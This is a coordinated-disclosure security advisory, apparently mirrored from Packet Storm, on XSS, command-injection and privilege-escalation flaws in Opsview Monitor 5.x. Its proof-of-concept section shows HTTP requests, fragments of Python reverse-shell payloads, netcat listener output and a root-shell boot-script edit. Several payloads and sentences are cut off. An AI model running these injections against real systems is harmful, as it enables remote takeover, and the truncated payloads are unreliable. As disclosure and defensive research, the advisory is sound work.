Lucene search

packetstormCore Security TechnologiesPACKETSTORM:149236
HistorySep 05, 2018 - 12:00 a.m.

Opsview Monitor 5.x Command Execution

Core Security Technologies

0.03 Low




`Core Security - Corelabs Advisory  
Opsview Monitor Multiple Vulnerabilities  
1. **Advisory Information**  
Title: Opsview Monitor Multiple Vulnerabilities  
Advisory ID: CORE-2018-0008  
Advisory URL:  
Date published: 2018-09-04  
Date of last update: 2018-09-04  
Vendors contacted: Opsview  
Release mode: Coordinated release  
2. **Vulnerability Information**  
Class: Improper Neutralization of Input During Web Page Generation  
[CWE-79], Improper Neutralization of Input During Web Page Generation  
[CWE-79], Improper Neutralization of Special Elements used in an OS  
Command [CWE-78], Improper Neutralization of Special Elements used in  
an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,  
3. **Vulnerability Description**  
Opsview's website states that:  
Opsview[1] builds monitoring software that helps DevOps understand how  
the performance of their hybrid IT infrastructure & apps impacts  
business service delivery. Opsview Monitor supports +3500 Nagios plugins  
and service checks making it easy to monitor everything from Docker and  
VMware to Amazon Web Services, Hyper-V and more.  
Multiple vulnerabilities were found in the Opsview Monitor, which would  
allow an attacker with access to the management console to execute  
commands on the operating system.  
4. **Vulnerable Packages**  
. Opsview Monitor 5.4  
. Opsview Monitor 5.3  
. Opsview Monitor 5.2  
Other products and versions might be affected, but they were not tested.  
5. **Vendor Information, Solutions and Workarounds**  
Opsview released the following versions of its product that fix the  
reported issues.  
. Opsview Monitor 6.0  
. Opsview Monitor 5.4.2  
. Opsview Monitor 5.3.1  
In addition, Opsview published the following release notes:  
6. **Credits**  
These vulnerabilities were discovered and researched by Fernando Diaz  
and Fernando Catoira from Core Security Consulting Services. The  
publication of this advisory was coordinated by Leandro Cuozzo from Core  
Advisories Team.  
7. **Technical Description / Proof of Concept Code**  
Opsview Monitor is a virtual appliance designed to be deployed inside  
the organization's network infrastructure. It comes bundled with a Web  
Management Console to monitor and manage hosts and their services.  
Multiple vulnerabilities were found in the context of this appliance,  
which could allow a remote attacker to compromise the system.  
Vulnerabilities described in 7.1 and 7.2 could be abused to execute  
malicious JavaScript code in the context of a legitimate user.  
In addition, issues presented in 7.3 and 7.4 could allow an attacker to  
obtain command execution on the system as the nagios user. Finally, the  
issue found in one of the scripts run during the boot process presented  
in 7.5 would allow attackers to elevate their privileges from nagios  
user to root after a system restart, hence obtaining full control of the  
7.1. **Reflected Cross-Site Scripting in Diagnostics**  
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest'  
endpoint is vulnerable to Cross-Site Scripting.  
The following proof of concept demonstrates the vulnerability:  
Host: <serverIP>  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)  
Gecko/20100101 Firefox/59.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
7.2. **Persistent Cross-Site Scripting in Settings endpoint**  
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router'  
endpoint is vulnerable to Cross-Site Scripting. The following proof of  
concept demonstrates the vulnerability:  
POST /settings/api/router?_dc=1521575692128 HTTP/1.1  
Host: <serverIP>  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)  
Gecko/20100101 Firefox/59.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://<serverIP>/settings/  
x-opsview-username: rifle  
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503  
Content-Type: application/json  
X-Requested-With: XMLHttpRequest  
Content-Length: 506  
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;  
Connection: close  
The input will be stored without any sanitization and rendered every  
time the /settings section is visited by the user. It's important to  
point that this XSS is self stored and it's executed only in the context  
of the victim's session. However, this vulnerability can be exploited by  
an attacker to gain persistency and execute the malicious code each time  
the victim accesses to the settings section.  
Excerpt of the source code showing the injected script tag:  
7.3. **Notification abuse leading to remote command execution**  
[CVE-2018-16146] Opsview Web Management console provides a functionality  
accessible by an authenticated administrator to test notifications that  
are triggered under certain configurable events. The 'value' parameter  
is not properly sanitized, leading to an arbitrary command injection  
executed on the system with nagios' user privileges.  
The following proof of concept executes a reverse shell:  
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477  
Host: <serverIP>  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)  
Gecko/20100101 Firefox/58.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://<serverIP>/settings/  
x-opsview-username: admin  
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074  
Content-Type: application/json  
X-Requested-With: XMLHttpRequest  
Content-Length: 376  
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;  
Connection: close  
|| python -c 'import  
nc -lvp 16000  
Listening on [] (family 0, port 16000)  
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,  
sport 43016)  
$ id  
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)  
Additionally, it is possible to combine this issue with a redirection  
functionality within the management console and the vulnerability  
described in 7.1 (Reflected Cross-Site Scripting), to build a specially  
crafted link that could be sent to an administrator to trigger a reverse  
In order to perform the attack, consider the following:  
. API's sensitive actions require a 'restToken' to be processed. This  
token could be obtained by a Cross-Site Scripting attack from a specific  
endpoint (/settings).  
. Abuse the login page redirection functionality to force the user to  
access the Cross-Site Scripting vulnerable URL described in 7.1 (you may  
also abuse the Cross-Site scripting vulnerability reported in given it is still present).  
If the user is already authenticated he will be automatically redirected.  
Otherwise, the login page will appear and the redirection will take  
place after a successful login.  
The following proof of concept presents a crafted link that could  
trigger a reverse shell if accessed by an administrator:  
Once clicked, the authenticated administrator will be redirected to the  
vulnerable section where his browser will perform a request to the  
'/settings' endpoint in order to obtain a valid 'restToken'. Finally,  
using that token, the API request to  
'rest/config/notificationmethod/testnotification' will be exploited thus  
resulting in a reverse shell.  
7.4. **Rancid test connection functionality abuse leading to command  
[CVE-2018-16144] NetAudit is a section within Network Analyzer that  
allows the user to automate the backing up of network devices'  
configuration files to a centralized location. The test connection  
functionality is vulnerable to command injection due to an improper  
sanitization of the 'rancid_password' parameter.  
The following proof of concept executes a reverse shell:  
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1  
Host: <serverIP>  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)  
Gecko/20100101 Firefox/59.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://<serverIP>/settings/  
x-opsview-username: admin  
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 434  
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;  
Connection: close  
nc -lvp 16000  
Listening on [] (family 0, port 16000)  
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,  
sport 43016)  
$ id  
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)  
$ uname -a  
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34  
UTC 2018 x86_64 x86_64 x86_64 GNU/Linux  
7.5. **Script modification could allow local privilege escalation**  
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios  
privileges and the scripts that run at boot time, impersonate nagios  
user during its execution. However, the  
'/etc/init.d/opsview-reporting-module' script invokes the  
'/opt/opsview/jasper/bin/db_jasper' script before dropping root  
The following excerpt shows the vulnerable code:  
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null  
if [ $? != 0 ]; then  
echo "Attempted to start jasperserver but MySQL credentials are wrong."  
exit 0  
test -x $DAEMON || exit 0  
# Switch to opsview user if run as root  
id | grep "uid=0(" >/dev/null  
if [ $? = 0 ] ; then  
su - opsview -c "$DAEMON $@"  
exec $DAEMON $@  
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the  
vulnerable script, can be edited by the nagios user which belongs to the  
'opsview' group.  
ls -ltr /opt/opsview/jasper/bin/db_jasper  
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017  
nagios@image-builder-299:/home/admin$ id  
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)  
Since 'db_jasper' receives 'db_exists' as an argument, which is later  
used in a case statement, an attacker could edit that specific part of  
the script in order to execute arbitrary code once the appliance is  
The following excerpt shows the attacker's bash script which, after  
execution, will trigger a reverse shell with root privileges:  
while [ "x$1" != "x" ] ; do  
case "$1" in  
python -c 'import  
os.dup2(s.fileno(),2);["/bin/bash","-i"]);' &  
exit $?  
exit $?  
die "Usage: $0  
$nc -lvp 16000  
Listening on [] (family 0, port 16000)  
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,  
sport 45566)  
# id  
uid=0(root) gid=0(root) groups=0(root)  
8. **Report Timeline**  
2018-05-03: Core Security sent an initial notification to Opsview,  
asking for GPG keys in order to send draft advisory.  
2018-05-04: Opsview replied attaching its GPG keys.  
2018-05-04: Core Security sent the encrypted draft advisory.  
2018-05-04: Opsview confirmed the reception of the advisory and informed  
an initial response would be ready by May 11th.  
2018-05-11: Opsview replied saying they were able to reproduce all of  
the reported vulnerabilities and confirmed that they were present in all  
supported versions of Opsview Monitor (5.4, 5.3 and 5.2).  
In addition, Opsview informed that were planning to release a fix for  
these versions by the end of July.  
2018-05-11: Core Security thanked the confirmation.  
2018-06-25: Opsview informed that they were planning to release a major  
update for the product (6.0) at the end of July. This update will  
address all reported vulnerabilities. Also, they informed that the  
previous versions of the product would be fixed by the end of August.  
2018-06-27: Core Security thanked the status update and asked for a  
tentative public disclosure date.  
2018-07-16: Core Security requested a status update.  
2018-07-18: Opsview proposed to set a tentative publication date by the  
end of August when they release the fixes for its earlier versions.  
2018-07-18: Core Security agreed with the Opsview's proposal.  
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0  
release will be available on July 25th. In addition, they  
informed that they didn't have the exact release date for the updates to  
previous versions of the product.  
2018-08-06: Core Security requested a status update for the remaining  
2018-08-13: Opsview replied saying that they were targeting the week of  
August 24th for release the fixes of their earlier product versions and  
they would confirm the exact date at the end of the next week.  
2018-08-13: Core Security thanked the reply.  
2018-08-24: Opsview informed Core Security that the remaining fixed  
versions will be available on August 29th.  
2018-08-24: Core Security thanked the update and proposed September 4th  
as the coordinated release date.  
2018-08-28: Opsview agreed on the proposed release date.  
2018-09-04: Advisory CORE-2018-0008 published.  
9. **References**  
10. **About CoreLabs**  
CoreLabs, the research center of Core Security, is charged with  
anticipating the future needs and requirements for information security  
We conduct our research in several important areas of computer security  
including system vulnerabilities, cyber attack planning and simulation,  
source code auditing, and cryptography. Our results include problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies. CoreLabs regularly publishes security  
advisories, technical papers, project information and shared software  
tools for public use at:  
11. **About Core Security**  
Core Security provides companies with the security insight they need to  
know who, how, and what is vulnerable in their organization. The  
company's threat-aware, identity & access, network security, and  
vulnerability management solutions provide actionable insight and  
context needed to manage security risks across the enterprise. This  
shared insight gives customers a comprehensive view of their security  
posture to make better security remediation decisions. Better insight  
allows organizations to prioritize their efforts to protect critical  
assets, take action sooner to mitigate access risk, and react faster if  
a breach does occur.  
Core Security is headquartered in the USA with offices and operations in  
South America, Europe, Middle East and Asia. To learn more, contact Core  
Security at (678) 304-4500 or [email protected]  
12. **Disclaimer**  
The contents of this advisory are copyright (c) 2018 Core Security and  
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution  
Non-Commercial Share-Alike 3.0 (United States) License:  